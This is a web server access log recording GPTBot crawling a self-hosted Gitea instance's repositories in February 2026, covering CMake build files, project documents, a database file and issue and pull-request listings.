"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/controller-cpp.md" +[17/Feb/2026:17:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/controller-cpp.md" +[17/Feb/2026:17:34:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/controller-cpp.md" +[17/Feb/2026:17:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/controller-cpp.md" +[17/Feb/2026:17:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10871] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" +[17/Feb/2026:17:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old?display=source" [Client 74.7.227.38] [Length 16606] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" +[17/Feb/2026:17:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" +[17/Feb/2026:17:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17360] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:17:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13919] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13919] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36195] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36194] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33383] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33689] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11134] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33678] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13713] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13711] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13710] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10138] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:17:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:17:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10125] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:17:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10128] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:17:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:17:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10130] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:17:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:17:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10128] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:17:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13647] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:17:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13646] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:17:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13645] [Gzip 7.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:17:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:17:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:17:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:17:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:17:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:17:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:17:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:17:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10132] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:17:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:17:34:47 +0000] - 200 200 - GET https 